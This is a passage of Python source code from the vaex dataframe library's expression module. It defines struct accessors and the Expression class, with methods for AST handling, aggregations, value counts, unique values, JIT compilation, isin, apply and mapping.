self._assert_struct_dtype()
return [self[i] for i in range(len(self))]
def items(self):
"""Return all fields with names along with corresponding vaex expressions.
:returns: list of tuples with field names and fields as vaex expressions.
Example:
>>> import vaex
>>> import pyarrow as pa
>>> array = pa.StructArray.from_arrays(arrays=[[1,2], ["a", "b"]], names=["col1", "col2"])
>>> df = vaex.from_arrays(array=array)
>>> df
# array
0 {'col1': 1, 'col2': 'a'}
1 {'col1': 2, 'col2': 'b'}
>>> df.array.struct.items()
[('col1',
Expression = struct_get(array, 0)
Length: 2 dtype: int64 (expression)
-----------------------------------
0 1
1 2),
('col2',
Expression = struct_get(array, 1)
Length: 2 dtype: string (expression)
------------------------------------
0 a
1 b)]
"""
self._assert_struct_dtype()
return list(zip(self.keys(), self.values()))
@property
def dtypes(self):
"""Return all field names along with corresponding types.
:returns: a pandas series with keys as index and types as values.
Example:
>>> import vaex
>>> import pyarrow as pa
>>> array = pa.StructArray.from_arrays(arrays=[[1,2], ["a", "b"]], names=["col1", "col2"])
>>> df = vaex.from_arrays(array=array)
>>> df
# array
0 {'col1': 1, 'col2': 'a'}
1 {'col1': 2, 'col2': 'b'}
>>> df.array.struct.dtypes
col1 int64
col2 string
dtype: object
"""
self._assert_struct_dtype()
dtypes = (field.type for field in self._array.type)
vaex_dtypes = [DataType(x) for x in dtypes]
return pd.Series(vaex_dtypes, index=self.keys())
def _assert_struct_dtype(self):
"""Ensure that struct operations are only called on valid struct dtype.
"""
from vaex.struct import assert_struct_dtype
assert_struct_dtype(self._array)
class Expression(with_metaclass(Meta)):
"""Expression class"""
def __init__(self, ds, expression, ast=None, _selection=False):
import vaex.dataframe
self.ds : vaex.dataframe.DataFrame = ds
assert not isinstance(ds, Expression)
if isinstance(expression, Expression):
expression = expression.expression
if expression is None and ast is None:
raise ValueError('Not both expression and the ast can be None')
self._ast = ast
self._expression = expression
self.df._expressions.append(weakref.ref(self))
self._ast_names = None
self._selection = _selection # selection have an extra scope
@property
def _label(self):
'''If a column is an invalid identified, the expression is df['long name']
This will return 'long name' in that case, otherwise simply the expression
'''
ast = self.ast
if isinstance(ast, expresso._ast.Subscript):
value = ast.slice.value
if isinstance(value, expresso.ast_Str):
return value.s
if isinstance(value, str): # py39+
return value
return self.expression
def fingerprint(self):
fp = vaex.cache.fingerprint(self.expression, self.df.fingerprint(dependencies=self.dependencies()))
return f'expression-{fp}'
def copy(self, df=None):
"""Efficiently copies an expression.
Expression objects have both a string and AST representation. Creating
the AST representation involves parsing the expression, which is expensive.
Using copy will deepcopy the AST when the expression was already parsed.
:param df: DataFrame for which the expression will be evaluated (self.df if None)
"""
# expression either has _expression or _ast not None
if df is None:
df = self.df
if self._expression is not None:
expression = Expression(df, self._expression)
if self._ast is not None:
expression._ast = copy.deepcopy(self._ast)
elif self._ast is not None:
expression = Expression(df, copy.deepcopy(self._ast))
if self._ast is not None:
expression._ast = self._ast
return expression
@property
def ast(self):
"""Returns the abstract syntax tree (AST) of the expression"""
if self._ast is None:
self._ast = expresso.parse_expression(self.expression)
return self._ast
@property
def ast_names(self):
if self._ast_names is None:
self._ast_names = expresso.names(self.ast)
return self._ast_names
@property
def _ast_slices(self):
return expresso.slices(self.ast)
@property
def expression(self):
if self._expression is None:
self._expression = expresso.node_to_string(self.ast)
return self._expression
@expression.setter
def expression(self, value):
# if we reassign to expression, we clear the ast cache
if value != self._expression:
self._expression = value
self._ast = None
def __bool__(self):
"""Cast expression to boolean. Only supports (<expr1> == <expr2> and <expr1> != <expr2>)
The main use case for this is to support assigning to traitlets. e.g.:
>>> bool(expr1 == expr2)
This will return True when expr1 and expr2 are exactly the same (in string representation). And similarly for:
>>> bool(expr != expr2)
All other cases will return True.
"""
# this is to make traitlets detect changes
import _ast
if isinstance(self.ast, _ast.Compare) and len(self.ast.ops) == 1 and isinstance(self.ast.ops[0], _ast.Eq):
return expresso.node_to_string(self.ast.left) == expresso.node_to_string(self.ast.comparators[0])
if isinstance(self.ast, _ast.Compare) and len(self.ast.ops) == 1 and isinstance(self.ast.ops[0], _ast.NotEq):
return expresso.node_to_string(self.ast.left) != expresso.node_to_string(self.ast.comparators[0])
return True
@property
def df(self):
# lets gradually move to using .df
return self.ds
@property
def dtype(self):
return self.df.data_type(self)
# TODO: remove this method?
def data_type(self, array_type=None, axis=0):
return self.df.data_type(self, axis=axis)
@property
def shape(self):
return self.df._shape_of(self)
@property
def ndim(self):
return 1 if self.dtype.is_list else len(self.df._shape_of(self))
def to_arrow(self, convert_to_native=False):
'''Convert to Apache Arrow array (will byteswap/copy if convert_to_native=True).'''
values = self.values
return vaex.array_types.to_arrow(values, convert_to_native=convert_to_native)
def __arrow_array__(self, type=None):
values = self.to_arrow()
return pa.array(values, type=type)
def to_numpy(self, strict=True):
"""Return a numpy representation of the data"""
values = self.values
return vaex.array_types.to_numpy(values, strict=strict)
def to_dask_array(self, chunks="auto"):
import dask.array as da
import uuid
dtype = self.dtype
chunks = da.core.normalize_chunks(chunks, shape=self.shape, dtype=dtype.numpy)
name = 'vaex-expression-%s' % str(uuid.uuid1())
def getitem(df, item):
assert len(item) == 1
item = item[0]
start, stop, step = item.start, item.stop, item.step
assert step in [None, 1]
return self.evaluate(start, stop, parallel=False)
if hasattr(da.core, "getem"):
dsk = da.core.getem(name, chunks, getitem=getitem, shape=self.shape, dtype=dtype.numpy)
dsk[name] = self
return da.Array(dsk, name, chunks, dtype=dtype.numpy)
else:
dsk = da.core.graph_from_arraylike(self, name=name, chunks=chunks, getitem=getitem, shape=self.shape, dtype=dtype.numpy)
return da.Array(dsk, name, chunks, dtype=dtype.numpy)
def to_pandas_series(self):
"""Return a pandas.Series representation of the expression.
Note: Pandas is likely to make a memory copy of the data.
"""
import pandas as pd
return pd.Series(self.values)
def __getitem__(self, slicer):
"""Provides row and optional field access (struct arrays) via bracket notation.
Examples:
>>> import vaex
>>> import pyarrow as pa
>>> array = pa.StructArray.from_arrays(arrays=[[1, 2, 3], ["a", "b", "c"]], names=["col1", "col2"])
>>> df = vaex.from_arrays(array=array, integer=[5, 6, 7])
>>> df
# array integer
0 {'col1': 1, 'col2': 'a'} 5
1 {'col1': 2, 'col2': 'b'} 6
2 {'col1': 3, 'col2': 'c'} 7
>>> df.integer[1:]
Expression = integer
Length: 2 dtype: int64 (column)
-------------------------------
0 6
1 7
>>> df.array[1:]
Expression = array
Length: 2 dtype: struct<col1: int64, col2: string> (column)
-----------------------------------------------------------
0 {'col1': 2, 'col2': 'b'}
1 {'col1': 3, 'col2': 'c'}
>>> df.array[:, "col1"]
Expression = struct_get(array, 'col1')
Length: 3 dtype: int64 (expression)
-----------------------------------
0 1
1 2
2 3
>>> df.array[1:, ["col1"]]
Expression = struct_project(array, ['col1'])
Length: 2 dtype: struct<col1: int64> (expression)
-------------------------------------------------
0 {'col1': 2}
1 {'col1': 3}
>>> df.array[1:, ["col2", "col1"]]
Expression = struct_project(array, ['col2', 'col1'])
Length: 2 dtype: struct<col2: string, col1: int64> (expression)
---------------------------------------------------------------
0 {'col2': 'b', 'col1': 2}
1 {'col2': 'c', 'col1': 3}
"""
if isinstance(slicer, slice):
indices = slicer
fields = None
elif isinstance(slicer, tuple) and len(slicer) == 2:
indices, fields = slicer
else:
raise NotImplementedError
if indices != slice(None):
expr = self.df[indices][self.expression]
else:
expr = self
if fields is None:
return expr
elif isinstance(fields, (int, str)):
if self.dtype.is_struct:
return expr.struct.get(fields)
elif self.ndim == 2:
if not isinstance(fields, int):
raise TypeError(f'Expected an integer, not {type(fields)}')
else:
return expr.getitem(fields)
else:
raise TypeError(f'Only getting struct fields or 2d columns supported')
elif isinstance(fields, (tuple, list)):
return expr.struct.project(fields)
else:
raise TypeError("Invalid type provided. Needs to be None, str or list/tuple.")
def __abs__(self):
"""Returns the absolute value of the expression"""
return self.abs()
@property
def dt(self):
"""Gives access to datetime operations via :py:class:`DateTime`"""
return DateTime(self)
@property
def td(self):
"""Gives access to timedelta operations via :py:class:`TimeDelta`"""
return TimeDelta(self)
@property
def str(self):
"""Gives access to string operations via :py:class:`StringOperations`"""
return StringOperations(self)
@property
def str_pandas(self):
"""Gives access to string operations via :py:class:`StringOperationsPandas` (using Pandas Series)"""
return StringOperationsPandas(self)
@property
def struct(self):
"""Gives access to struct operations via :py:class:`StructOperations`"""
return StructOperations(self)
@property
def values(self):
return self.evaluate()
def derivative(self, var, simplify=True):
var = _ensure_string_from_expression(var)
return self.__class__(self.ds, expresso.derivative(self.ast, var, simplify=simplify))
def expand(self, stop=[]):
"""Expand the expression such that no virtual columns occurs, only normal columns.
Example:
>>> df = vaex.example()
>>> r = np.sqrt(df.data.x**2 + df.data.y**2)
>>> r.expand().expression
'sqrt(((x ** 2) + (y ** 2)))'
"""
stop = _ensure_strings_from_expressions(stop)
def translate(id):
if id in self.ds.virtual_columns and id not in stop:
return self.ds.virtual_columns[id]
expr = expresso.translate(self.ast, translate)
return Expression(self.ds, expr)
def dependencies(self):
'''Get all dependencies of this expression, including ourselves'''
return self.variables(ourself=True)
def variables(self, ourself=False, expand_virtual=True, include_virtual=True):
"""Return a set of variables this expression depends on.
Example:
>>> df = vaex.example()
>>> r = np.sqrt(df.data.x**2 + df.data.y**2)
>>> r.variables()
{'x', 'y'}
"""
variables = set()
def record(varname):
# always do this for selection
if self._selection and self.df.has_selection(varname):
selection = self.df.get_selection(varname)
variables.update(selection.dependencies(self.df))
# do this recursively for virtual columns
if varname in self.ds.virtual_columns and varname not in variables:
if (include_virtual and (varname != self.expression)) or (varname == self.expression and ourself):
variables.add(varname)
if expand_virtual:
variables.update(self.df[self.df.virtual_columns[varname]].variables(ourself=include_virtual, include_virtual=include_virtual))
# we usually don't want to record ourself
elif varname != self.expression or ourself:
variables.add(varname)
expresso.translate(self.ast, record)
# df is a buildin, don't record it, if df is a column name, it will be collected as
# df['df']
variables -= {'df'}
for varname in self._ast_slices:
if varname in self.df.virtual_columns and varname not in variables:
if (include_virtual and (f"df['{varname}']" != self.expression)) or (f"df['{varname}']" == self.expression and ourself):
variables.add(varname)
if expand_virtual:
if varname in self.df.virtual_columns:
variables |= self.df[self.df.virtual_columns[varname]].variables(ourself=include_virtual, include_virtual=include_virtual)
elif f"df['{varname}']" != self.expression or ourself:
variables.add(varname)
return variables
def _graph(self):
""""Return a graph containing the dependencies of this expression
Structure is:
[<string expression>, <function name if callable>, <function object if callable>, [subgraph/dependencies, ....]]
"""
expression = self.expression
def walk(node):
if isinstance(node, six.string_types):
if node in self.ds.virtual_columns:
ex = Expression(self.ds, self.ds.virtual_columns[node])
return [node, None, None, [ex._graph()]]
else:
return node
else:
fname, node_repr, deps = node
if len(node_repr) > 30: # clip too long expressions
node_repr = node_repr[:26] + ' ....'
deps = [walk(dep) for dep in deps]
obj = self.ds.functions.get(fname)
# we don't want the wrapper, we want the underlying object
if isinstance(obj, Function):
obj = obj.f
if isinstance(obj, FunctionSerializablePickle):
obj = obj.f
return [node_repr, fname, obj, deps]
return walk(expresso._graph(expression))
def _graphviz(self, dot=None):
"""Return a graphviz.Digraph object with a graph of the expression"""
from graphviz import Graph, Digraph
node = self._graph()
dot = dot or Digraph(comment=self.expression)
def walk(node):
if isinstance(node, six.string_types):
dot.node(node, node)
return node, node
else:
node_repr, fname, fobj, deps = node
node_id = node_repr
dot.node(node_id, node_repr)
for dep in deps:
dep_id, dep = walk(dep)
dot.edge(node_id, dep_id)
return node_id, node
walk(node)
return dot
def __str__(self):
return self.expression
# def __array__(self, dtype=None):
# '''For casting to a numpy array
# Example:
# >>> np.array(ds.x**2)
# '''
# return self.ds.evaluate(self)
def tolist(self, i1=None, i2=None):
'''Short for expr.evaluate().tolist()'''
values = self.evaluate(i1=i1, i2=i2)
if isinstance(values, (pa.Array, pa.ChunkedArray)):
return values.to_pylist()
return values.tolist()
if not os.environ.get('VAEX_DEBUG', ''):
def __repr__(self):
return self._repr_plain_()
def _repr_plain_(self):
from .formatting import _format_value
def format(values):
for i in range(len(values)):
value = values[i]
yield _format_value(value)
colalign = ("right",) * 2
try:
N = len(self.ds)
if N <= PRINT_MAX_COUNT:
values = format(self.evaluate(0, N))
values = tabulate.tabulate([[i, k] for i, k in enumerate(values)], tablefmt='plain', colalign=colalign)
else:
values_head = format(self.evaluate(0, PRINT_MAX_COUNT//2))
values_tail = format(self.evaluate(N - PRINT_MAX_COUNT//2, N))
values_head = list(zip(range(PRINT_MAX_COUNT//2), values_head)) +\
list(zip(range(N - PRINT_MAX_COUNT//2, N), values_tail))
values = tabulate.tabulate([k for k in values_head], tablefmt='plain', colalign=colalign)
values = values.split('\n')
width = max(map(len, values))
separator = '\n' + '...'.center(width, ' ') + '\n'
values = "\n".join(values[:PRINT_MAX_COUNT//2]) + separator + "\n".join(values[PRINT_MAX_COUNT//2:]) + '\n'
except Exception as e:
values = 'Error evaluating: %r' % e
expression = self.expression
if len(expression) > 60:
expression = expression[:57] + '...'
info = 'Expression = ' + expression + '\n'
dtype = self.dtype
if self.expression in self.ds.get_column_names(hidden=True):
state = "column"
elif self.expression in self.ds.get_column_names(hidden=True):
state = "virtual column"
else:
state = "expression"
line = 'Length: {:,} dtype: {} ({})\n'.format(len(self.ds), dtype, state)
info += line
info += '-' * (len(line)-1) + '\n'
info += values
return info
def count(self, binby=[], limits=None, shape=default_shape, selection=False, delay=False, edges=False, progress=None):
'''Shortcut for ds.count(expression, ...), see `Dataset.count`'''
kwargs = dict(locals())
del kwargs['self']
kwargs['expression'] = self.expression
return self.ds.count(**kwargs)
def sum(self, axis=None, binby=[], limits=None, shape=default_shape, selection=False, delay=False, progress=None):
'''Sum elements over given axis.
If no axis is given, it will sum over all axes.
For non list elements, this is a shortcut for ds.sum(expression, ...), see `Dataset.sum`.
>>> list_data = [1, 2, None], None, [], [1, 3, 4, 5]
>>> df = vaex.from_arrays(some_list=pa.array(list_data))
>>> df.some_list.sum().item() # will sum over all axis
16
>>> df.some_list.sum(axis=1).tolist() # sums the list elements
[3, None, 0, 13]
:param int axis: Axis over which to determine the unique elements (None will flatten arrays or lists)
'''
expression = self
if axis is None:
dtype = self.dtype
if dtype.is_list:
axis = [0]
while dtype.is_list:
axis.append(axis[-1] + 1)
dtype = dtype.value_type
elif self.ndim > 1:
axis = list(range(self.ndim))
else:
axis = [0]
elif not isinstance(axis, list):
axis = [axis]
axis = list(set(axis)) # remove repeated elements
dtype = self.dtype
if self.ndim > 1:
array_axes = axis.copy()
if 0 in array_axes:
array_axes.remove(0)
expression = expression.array_sum(axis=array_axes)
for i in array_axes:
axis.remove(i)
del i
del array_axes
elif 1 in axis:
if self.dtype.is_list:
expression = expression.list_sum()
if axis:
axis.remove(1)
else:
raise ValueError(f'axis=1 not supported for dtype={dtype}')
if axis and axis[0] != 0:
raise ValueError(f'Only axis 0 or 1 is supported')
if expression.ndim > 1:
raise ValueError(f'Cannot sum non-scalar (ndim={expression.ndim})')
if axis is None or 0 in axis:
kwargs = dict(locals())
del kwargs['self']
del kwargs['axis']
del kwargs['dtype']
kwargs['expression'] = expression.expression
return self.ds.sum(**kwargs)
else:
return expression
def mean(self, binby=[], limits=None, shape=default_shape, selection=False, delay=False, progress=None):
'''Shortcut for ds.mean(expression, ...), see `Dataset.mean`'''
kwargs = dict(locals())
del kwargs['self']
kwargs['expression'] = self.expression
return self.ds.mean(**kwargs)
def std(self, binby=[], limits=None, shape=default_shape, selection=False, delay=False, progress=None):
'''Shortcut for ds.std(expression, ...), see `Dataset.std`'''
kwargs = dict(locals())
del kwargs['self']
kwargs['expression'] = self.expression
return self.ds.std(**kwargs)
def var(self, binby=[], limits=None, shape=default_shape, selection=False, delay=False, progress=None):
'''Shortcut for ds.std(expression, ...), see `Dataset.var`'''
kwargs = dict(locals())
del kwargs['self']
kwargs['expression'] = self.expression
return self.ds.var(**kwargs)
def skew(self, binby=[], limits=None, shape=default_shape, selection=False, delay=False, progress=None):
'''Shortcut for df.skew(expression, ...), see `DataFrame.skew`'''
kwargs = dict(locals())
del kwargs['self']
kwargs['expression'] = self.expression
return self.df.skew(**kwargs)
def kurtosis(self, binby=[], limits=None, shape=default_shape, selection=False, delay=False, progress=None):
'''Shortcut for df.kurtosis(expression, ...), see `DataFrame.kurtosis`'''
kwargs = dict(locals())
del kwargs['self']
kwargs['expression'] = self.expression
return self.df.kurtosis(**kwargs)
def minmax(self, binby=[], limits=None, shape=default_shape, selection=False, delay=False, progress=None):
'''Shortcut for ds.minmax(expression, ...), see `Dataset.minmax`'''
kwargs = dict(locals())
del kwargs['self']
kwargs['expression'] = self.expression
return self.ds.minmax(**kwargs)
def min(self, binby=[], limits=None, shape=default_shape, selection=False, delay=False, progress=None):
'''Shortcut for ds.min(expression, ...), see `Dataset.min`'''
kwargs = dict(locals())
del kwargs['self']
kwargs['expression'] = self.expression
return self.ds.min(**kwargs)
def max(self, binby=[], limits=None, shape=default_shape, selection=False, delay=False, progress=None):
'''Shortcut for ds.max(expression, ...), see `Dataset.max`'''
kwargs = dict(locals())
del kwargs['self']
kwargs['expression'] = self.expression
return self.ds.max(**kwargs)
def nop(self):
"""Evaluates expression, and drop the result, usefull for benchmarking, since vaex is usually lazy"""
return self.ds.nop(self.expression)
@property
def transient(self):
"""If this expression is not transient (e.g. on disk) optimizations can be made"""
return self.expand().expression not in self.ds.columns
@property
def masked(self):
"""Alias to df.is_masked(expression)"""
return self.ds.is_masked(self.expression)
@docsubst
def value_counts(self, dropna=False, dropnan=False, dropmissing=False, ascending=False, progress=False, axis=None):
"""Computes counts of unique values.
WARNING:
* If the expression/column is not categorical, it will be converted on the fly
* dropna is False by default, it is True by default in pandas
:param dropna: {dropna}
:param dropnan: {dropnan}
:param dropmissing: {dropmissing}
:param ascending: when False (default) it will report the most frequent occuring item first
:param progress: {progress}
:param bool axis: Axis over which to determine the unique elements (None will flatten arrays or lists)
:returns: Pandas series containing the counts
"""
from pandas import Series
if axis is not None:
raise ValueError('only axis=None is supported')
if dropna:
dropnan = True
dropmissing = True
data_type = self.data_type()
data_type_item = self.data_type(axis=-1)
transient = self.transient or self.ds.filtered or self.ds.is_masked(self.expression)
if self.is_string() and not transient:
# string is a special case, only ColumnString are not transient
ar = self.ds.columns[self.expression]
if not isinstance(ar, ColumnString):
transient = True
counter_type = counter_type_from_dtype(data_type_item, transient)
counters = [None] * self.ds.executor.thread_pool.nthreads
def map(thread_index, i1, i2, selection_masks, blocks):
ar = blocks[0]
if len(ar) == 0:
return 0
if counters[thread_index] is None:
counters[thread_index] = counter_type(1)
if data_type.is_list and axis is None:
try:
ar = ar.values
except AttributeError: # pyarrow ChunkedArray
ar = ar.combine_chunks().values
if data_type_item.is_string:
ar = _to_string_sequence(ar)
else:
ar = vaex.array_types.to_numpy(ar)
if np.ma.isMaskedArray(ar):
mask = np.ma.getmaskarray(ar)
counters[thread_index].update(ar, mask)
else:
counters[thread_index].update(ar)
return 0
def reduce(a, b):
return a+b
progressbar = vaex.utils.progressbars(progress, title="value counts")
self.ds.map_reduce(map, reduce, [self.expression], delay=False, progress=progressbar, name='value_counts', info=True, to_numpy=False)
counters = [k for k in counters if k is not None]
counter = counters[0]
for other in counters[1:]:
counter.merge(other)
if data_type_item.is_object:
# for dtype=object we use the old interface
# since we don't care about multithreading (cannot release the GIL)
key_values = counter.extract()
keys = list(key_values.keys())
counts = list(key_values.values())
if counter.has_nan and not dropnan:
keys = [np.nan] + keys
counts = [counter.nan_count] + counts
if counter.has_null and not dropmissing:
keys = [None] + keys
counts = [counter.null_count] + counts
if dropmissing and None in keys:
# we still can have a None in the values
index = keys.index(None)
keys.pop(index)
counts.pop(index)
counts = np.array(counts)
keys = np.array(keys)
else:
keys = counter.key_array()
counts = counter.counts()
if isinstance(keys, (vaex.strings.StringList32, vaex.strings.StringList64)):
keys = vaex.strings.to_arrow(keys)
deletes = []
if counter.has_nan:
null_offset = 1
else:
null_offset = 0
if dropmissing and counter.has_null:
deletes.append(counter.null_index)
if dropnan and counter.has_nan:
deletes.append(counter.nan_index)
if vaex.array_types.is_arrow_array(keys):
indices = np.delete(np.arange(len(keys)), deletes)
keys = keys.take(indices)
else:
keys = np.delete(keys, deletes)
if not dropmissing and counter.has_null:
mask = np.zeros(len(keys), dtype=np.uint8)
mask[null_offset] = 1
keys = np.ma.array(keys, mask=mask)
counts = np.delete(counts, deletes)
order = np.argsort(counts)
if not ascending:
order = order[::-1]
counts = counts[order]
keys = keys.take(order)
keys = keys.tolist()
if None in keys:
index = keys.index(None)
keys.pop(index)
keys = ["missing"] + keys
counts = counts.tolist()
count_null = counts.pop(index)
counts = [count_null] + counts
return Series(counts, index=keys)
@docsubst
def unique(self, dropna=False, dropnan=False, dropmissing=False, selection=None, axis=None, limit=None, limit_raise=True, array_type='list', progress=None, delay=False):
"""Returns all unique values.
:param dropna: {dropna}
:param dropnan: {dropnan}
:param dropmissing: {dropmissing}
:param selection: {selection}
:param bool axis: Axis over which to determine the unique elements (None will flatten arrays or lists)
:param int limit: {limit}
:param bool limit_raise: {limit_raise}
:param bool array_type: {array_type}
:param progress: {progress}
:param bool delay: {delay}
"""
return self.ds.unique(self, dropna=dropna, dropnan=dropnan, dropmissing=dropmissing, selection=selection, array_type=array_type, axis=axis, limit=limit, limit_raise=limit_raise, progress=progress, delay=delay)
@docsubst
def nunique(self, dropna=False, dropnan=False, dropmissing=False, selection=None, axis=None, limit=None, limit_raise=True, progress=None, delay=False):
"""Counts number of unique values, i.e. `len(df.x.unique()) == df.x.nunique()`.
:param dropna: {dropna}
:param dropnan: {dropnan}
:param dropmissing: {dropmissing}
:param selection: {selection}
:param bool axis: Axis over which to determine the unique elements (None will flatten arrays or lists)
:param int limit: {limit}
:param bool limit_raise: {limit_raise}
:param progress: {progress}
:param bool delay: {delay}
"""
def key_function():
fp = vaex.cache.fingerprint(self.fingerprint(), dropna, dropnan, dropmissing, selection, axis, limit)
return f'nunique-{fp}'
@vaex.cache._memoize(key_function=key_function, delay=delay)
def f():
value = self.unique(dropna=dropna, dropnan=dropnan, dropmissing=dropmissing, selection=selection, axis=axis, limit=limit, limit_raise=limit_raise, array_type=None, progress=progress, delay=delay)
if delay:
return value.then(len)
else:
return len(value)
return f()
def countna(self):
"""Returns the number of Not Availiable (N/A) values in the expression.
This includes missing values and np.nan values.
"""
return self.isna().sum().item() # so the output is int, not array
def countnan(self):
"""Returns the number of NaN values in the expression."""
return self.isnan().sum().item() # so the output is int, not array
def countmissing(self):
"""Returns the number of missing values in the expression."""
return self.ismissing().sum().item() # so the output is int, not array
def evaluate(self, i1=None, i2=None, out=None, selection=None, parallel=True, array_type=None):
return self.ds.evaluate(self, i1, i2, out=out, selection=selection, array_type=array_type, parallel=parallel)
# TODO: it is not so elegant we need to have a custom version of this
# it now also misses the docstring, reconsider how the the meta class auto
# adds this method
def fillna(self, value, fill_nan=True, fill_masked=True):
expression = self._upcast_for(value)
return self.ds.func.fillna(expression, value=value, fill_nan=fill_nan, fill_masked=fill_masked)
def _upcast_for(self, value):
# make sure the dtype is compatible with value
expression = self
dtype = self.dtype
if dtype == int:
required_dtype = vaex.utils.required_dtype_for_int(value, signed=dtype.is_signed)
if required_dtype.itemsize > dtype.numpy.itemsize:
expression = self.astype(str(required_dtype))
return expression
def fillmissing(self, value):
'''Returns an array where missing values are replaced by value.
See :`ismissing` for the definition of missing values.
'''
expression = self._upcast_for(value)
return self.df.func.fillmissing(expression, value=value)
def clip(self, lower=None, upper=None):
return self.ds.func.clip(self, lower, upper)
def jit_metal(self, verbose=False):
from .metal import FunctionSerializableMetal
f = FunctionSerializableMetal.build(self.expression, df=self.ds, verbose=verbose, compile=self.ds.is_local())
function = self.ds.add_function('_jit', f, unique=True)
return function(*f.arguments)
def jit_numba(self, verbose=False):
f = FunctionSerializableNumba.build(self.expression, df=self.ds, verbose=verbose, compile=self.ds.is_local())
function = self.ds.add_function('_jit', f, unique=True)
return function(*f.arguments)
def jit_cuda(self, verbose=False):
f = FunctionSerializableCuda.build(self.expression, df=self.ds, verbose=verbose, compile=self.ds.is_local())
function = self.ds.add_function('_jit', f, unique=True)
return function(*f.arguments)
def jit_pythran(self, verbose=False):
import logging
logger = logging.getLogger('pythran')
log_level = logger.getEffectiveLevel()
try:
if not verbose:
logger.setLevel(logging.ERROR)
import pythran
import imp
import hashlib
# self._import_all(module)
names = []
funcs = set(expression_namespace.keys())
expression = self.expression
if expression in self.ds.virtual_columns:
expression = self.ds.virtual_columns[self.expression]
all_vars = self.ds.get_column_names(virtual=True, strings=True, hidden=True) + list(self.ds.variables.keys())
vaex.expresso.validate_expression(expression, all_vars, funcs, names)
names = list(set(names))
types = ", ".join(str(self.ds.data_type(name)) + "[]" for name in names)
argstring = ", ".join(names)
code = '''
from numpy import *
#pythran export f({2})
def f({0}):
return {1}'''.format(argstring, expression, types)
if verbose:
print("generated code")
print(code)
m = hashlib.md5()
m.update(code.encode('utf-8'))
module_name = "pythranized_" + m.hexdigest()
# print(m.hexdigest())
module_path = pythran.compile_pythrancode(module_name, code, extra_compile_args=["-DBOOST_SIMD", "-march=native"] + [] if verbose else ["-w"])
module = imp.load_dynamic(module_name, module_path)
function_name = "f_" + m.hexdigest()
function = self.ds.add_function(function_name, module.f, unique=True)
return Expression(self.ds, "{0}({1})".format(function.name, argstring))
finally:
logger.setLevel(log_level)
def _rename(self, old, new, inplace=False):
expression = self if inplace else self.copy()
if old in expression.ast_names:
for node in expression.ast_names[old]:
node.id = new
expression._ast_names[new] = expression._ast_names.pop(old)
slices = expression._ast_slices
if old in slices:
for node in slices[old]:
if node.value.id == 'df' and isinstance(node.slice.value, ast.Str):
node.slice.value.s = new
else: # py39
node.slice.value = new
expression._expression = None # resets the cached string representation
return expression
def astype(self, data_type):
if vaex.array_types.is_string_type(data_type) or data_type == str:
return self.ds.func.astype(self, 'str')
else:
return self.ds.func.astype(self, str(data_type))
def isin(self, values, use_hashmap=True):
"""Lazily tests if each value in the expression is present in values.
:param values: List/array of values to check
:param use_hashmap: use a hashmap or not (especially faster when values contains many elements)
:return: :class:`Expression` with the lazy expression.
"""
if self.df.is_category(self) and self.df._future_behaviour:
labels = self.df.category_labels(self.expression)
indices = []
for value in values:
if value not in labels:
pass
else:
indices.append(labels.index(value))
indices = np.array(indices, dtype=self.index_values().dtype.numpy)
return self.index_values().isin(indices, use_hashmap=use_hashmap)
if self.is_string():
values = pa.array(values, type=pa.large_string())
else:
# ensure that values are the same dtype as the expression (otherwise the set downcasts at the C++ level during execution)
values = np.array(values, dtype=self.dtype.numpy)
if use_hashmap:
# easiest way to create a set is using the vaex dataframe
df_values = vaex.from_arrays(x=values)
ordered_set = df_values._set(df_values.x)
var = self.df.add_variable('var_isin_ordered_set', ordered_set, unique=True)
return self.df['isin_set(%s, %s)' % (self, var)]
else:
var = self.df.add_variable('isin_values', values, unique=True)
return self.df['isin(%s, %s)' % (self, var)]
def apply(self, f, vectorize=False, multiprocessing=True):
"""Apply a function along all values of an Expression.
Shorthand for ``df.apply(f, arguments=[expression])``, see :meth:`DataFrame.apply`
Example:
>>> df = vaex.example()
>>> df.x
Expression = x
Length: 330,000 dtype: float64 (column)
---------------------------------------
0 -0.777471
1 3.77427
2 1.37576
3 -7.06738
4 0.243441
>>> def func(x):
... return x**2
>>> df.x.apply(func)
Expression = lambda_function(x)
Length: 330,000 dtype: float64 (expression)
-------------------------------------------
0 0.604461
1 14.2451
2 1.89272
3 49.9478
4 0.0592637
:param f: A function to be applied on the Expression values
:param vectorize: Call f with arrays instead of a scalars (for better performance).
:param bool multiprocessing: Use multiple processes to avoid the GIL (Global interpreter lock).
:returns: A function that is lazily evaluated when called.
"""
return self.ds.apply(f, [self.expression], vectorize=vectorize, multiprocessing=multiprocessing)
def dropmissing(self):
# TODO: df.dropna does not support inplace
# df = self.df if inplace else self.df.copy()
df = self.ds
df = df.dropmissing(column_names=[self.expression])
return df._expr(self.expression)
def dropnan(self):
# TODO: df.dropna does not support inplace
# df = self.df if inplace else self.df.copy()
df = self.ds
df = df.dropnan(column_names=[self.expression])
return df._expr(self.expression)
def dropna(self):
# TODO: df.dropna does not support inplace
# df = self.df if inplace else self.df.copy()
df = self.ds
df = df.dropna(column_names=[self.expression])
return df._expr(self.expression)
def map(self, mapper, nan_value=None, missing_value=None, default_value=None, allow_missing=False, axis=None):
"""Map values of an expression or in memory column according to an input
dictionary or a custom callable function.
Example:
>>> import vaex
>>> df = vaex.from_arrays(color=['red', 'red', 'blue', 'red', 'green'])
>>> mapper = {'red': 1, 'blue': 2, 'green': 3}
>>> df['color_mapped'] = df.color.map(mapper)
>>> df
# color color_mapped
0 red 1
1 red 1
2 blue 2
3 red 1
4 green 3
>>> import numpy as np
>>> df = vaex.from_arrays(type=[0, 1, 2, 2, 2, np.nan])
>>> df['role'] = df['type'].map({0: 'admin', 1: 'maintainer', 2: 'user', np.nan: 'unknown'})
>>> df
# type role
0 0 admin
1 1 maintainer
2 2 user
3 2 user
4 2 user
5 nan unknown
>>> import vaex
>>> import numpy as np
>>> df = vaex.from_arrays(type=[0, 1, 2, 2, 2, 4])
>>> df['role'] = df['type'].map({0: 'admin', 1: 'maintainer', 2: 'user'}, default_value='unknown')
>>> df
# type role
0 0 admin
1 1 maintainer
2 2 user
3 2 user
4 2 user
5 4 unknown
:param mapper: dict like object used to map the values from keys to values
:param nan_value: value to be used when a nan is present (and not in the mapper)
:param missing_value: value to use used when there is a missing value
:param default_value: value to be used when a value is not in the mapper (like dict.get(key, default))
:param allow_missing: used to signal that values in the mapper should map to a masked array with missing values,
assumed True when default_value is not None.
:param bool axis: Axis over which to determine the unique elements (None will flatten arrays or lists)
:return: A vaex expression
:rtype: vaex.expression.Expression
"""
assert isinstance(mapper, collectionsAbc.Mapping), "mapper should be a dict like object"
if axis is not None:
